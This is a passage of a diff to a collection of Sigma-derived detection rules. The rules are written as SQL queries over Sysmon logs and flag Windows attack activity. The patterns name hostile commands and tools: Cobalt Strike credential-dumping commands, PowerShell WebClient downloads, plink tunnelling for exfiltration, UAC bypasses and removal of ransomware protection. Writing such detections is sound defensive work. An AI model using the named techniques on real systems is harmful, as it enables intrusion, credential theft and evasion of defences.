CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image 
LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla 
Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' 
ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", 
@@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM 
Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to 
install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE 
'%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential Defense Evasion Via Right-to-Left Override", - "id": 
"ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", - "author": "Micah Babinski, @micahbabinski", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.002" + "attack.t1564.004" ], "falsepositives": [ - "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%‮%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%~1.exe%' ESCAPE '\\' OR Image LIKE '%~1.bat%' ESCAPE '\\' OR Image LIKE '%~1.msi%' ESCAPE '\\' OR Image LIKE '%~1.vbe%' ESCAPE '\\' OR Image LIKE '%~1.vbs%' ESCAPE '\\' OR Image LIKE '%~1.dll%' ESCAPE '\\' OR Image LIKE '%~1.ps1%' ESCAPE '\\' OR Image LIKE '%~1.js%' ESCAPE '\\' OR Image LIKE '%~1.hta%' ESCAPE '\\' OR Image LIKE '%~2.exe%' ESCAPE '\\' OR Image LIKE '%~2.bat%' ESCAPE '\\' OR Image LIKE '%~2.msi%' ESCAPE '\\' OR Image LIKE '%~2.vbe%' ESCAPE '\\' OR Image LIKE '%~2.vbs%' ESCAPE '\\' OR Image LIKE '%~2.dll%' ESCAPE '\\' OR Image LIKE '%~2.ps1%' ESCAPE '\\' OR Image LIKE '%~2.js%' ESCAPE '\\' OR Image LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%-installer.exe' ESCAPE '\\') OR Image LIKE '%\\\\vcredi%' ESCAPE '\\' OR 
ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_right_to_left_override.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "UAC Bypass Using IEInstal - Process", - "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_ieinstal.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "PowerShell DownloadFile", - "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", - "status": "test", - "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "title": "HackTool - Htran/NATBypass Execution", + "id": 
"f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.command_and_control", - "attack.t1104", - "attack.t1105" + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\htran.exe' ESCAPE '\\' OR Image LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Formbook Process Creation", - "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", "status": "test", - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
